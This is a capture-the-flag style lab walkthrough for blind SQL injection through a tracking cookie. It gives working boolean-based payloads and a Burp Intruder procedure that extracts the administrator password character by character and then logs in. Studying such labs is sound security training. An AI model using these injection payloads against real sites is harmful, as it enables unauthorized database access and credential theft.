Blind SQL injection with conditional responses

Description

This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.

The results of the SQL query are not returned, and no error messages are displayed. But the application includes a “Welcome back” message in the page if the query returns any rows.

The database contains a different table called users, with columns called username and password. By exploiting the blind SQL injection vulnerability we can find out the password of the administrator user.

Reproduction and proof of concept

  1. Confirm TrackingId parameter is vulnerable: Visit the front page of the shop, and use Burp Suite to intercept and modify the request containing the TrackingId cookie.

Cookie: TrackingId=qKu8R40rq4Hdsfpb; session=2IsD4KyEz4hxnNcI3RdIZbsVggIw71c5

  1. Send to Repeater. Change the TrackingId cookie to: TrackingId=qKu8R40rq4Hdsfpb' AND '1'='1. The “Welcome back” message appears in the response.

  2. Now change it to: TrackingId=qKu8R40rq4Hdsfpb' AND '1'='2. The “Welcome back” message does not appear in the response. This confirms TrackingId is a vulnerable parameter.

  3. Confirm there is a users table. Now change it to: TrackingId=qKu8R40rq4Hdsfpb' AND (SELECT 'a' FROM users LIMIT 1)='a. There is a “Welcome Back” so the condition is true, confirming that there is a table called users.

  4. Now confirm that the username administrator exists in the users table. Change the TrackingId parameter to:

TrackingId=qKu8R40rq4Hdsfpb' AND (SELECT username FROM users WHERE username='administrator')='administrator'--'

“Welcome back”, so the condition is true, confirming that there is a user called administrator.

  1. The next step is to determine how many characters are in the password of the administrator user. To do this, change the value to:

TrackingId=qKu8R40rq4Hdsfpb' AND (SELECT username FROM users WHERE username='administrator' AND LENGTH(password)>1)='administrator'--'

  1. Send a series of follow-up values to test different password lengths. Send:

TrackingId=qKu8R40rq4Hdsfpb' AND (SELECT username FROM users WHERE username='administrator' AND LENGTH(password)>2)='administrator'--'

TrackingId=qKu8R40rq4Hdsfpb' AND (SELECT username FROM users WHERE username='administrator' AND LENGTH(password)>3)='administrator'--'

Etcetera. You can do this manually using Burp Repeater, since the length is likely to be short. When the condition stops being true (i.e. when the “Welcome back” message disappears), you have determined the length of the password, which is 20 characters long.

Request: SQLi

Response: SQLi

  1. After determining the length of the password, the next step is to test the character at each position to determine its value. This involves a much larger number of requests. Send the request you are working on to Burp Intruder, using the context menu.

  2. In the Positions tab of Burp Intruder, clear the default payload positions by clicking the “Clear §” button.

  3. I took a break, and the lab timed out. New TrackingId value of tFVVYAOZtT7hz2qi. In the Positions tab, change the value of the cookie to:

TrackingId=tFVVYAOZtT7hz2qi' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='a'--

This uses the SUBSTRING() function to extract a single character from the password, and test it against a specific value. The attack will cycle through each position and possible value, testing each one in turn.

  1. Place payload position markers around the final a character in the cookie value. To do this, select just the a, and click the “Add §” button:

TrackingId=tFVVYAOZtT7hz2qi'+AND+(SELECT+SUBSTRING(password,1,1)+FROM+users WHERE+username&3d'administrator')%3d'§a§'--

SQLi

  1. To test the character at each position, send suitable payloads in the payload position defined. For this lab, assume that the password contains only lowercase alphanumeric characters. Go to the Payloads tab, check that “Bruteforcer” is selected, and under “Payload Options” the range a-z and 0-9 are by default set.

SQLi

  1. To be able to tell when the correct character was submitted, grep each response for the expression “Welcome back”. To do this, go to the Options tab, and the “Grep - Match” section. Clear any existing entries in the list, and then add the value “Welcome back”.

SQLi

  1. Launch the attack by clicking the “Start attack” button or selecting “Start attack” from the Intruder menu.

  2. Review the attack results to find the value of the character at the first position. You should see a column in the results called “Welcome back”. One of the rows should have a tick in this column. The payload showing for that row is the value of the character at the first position.

  3. Re-run the attack for each of the other character positions in the password, to determine their value. To do this, go back to the main Burp window, and the Positions tab of Burp Intruder, and change the specified offset from 1 to 2:

TrackingId=tFVVYAOZtT7hz2qi'+AND+(SELECT+SUBSTRING(password,2,1)+FROM+users WHERE+username&3d'administrator')%3d'§a§'--

  1. Launch the modified attack, review the results, and note the character at the second offset.

  2. Continue this process testing offset 3, 4, and so on, until 20 and you have the whole password.

  3. In the browser, click “My account” to open the login page. Use the password to log in as the administrator user.

SQLi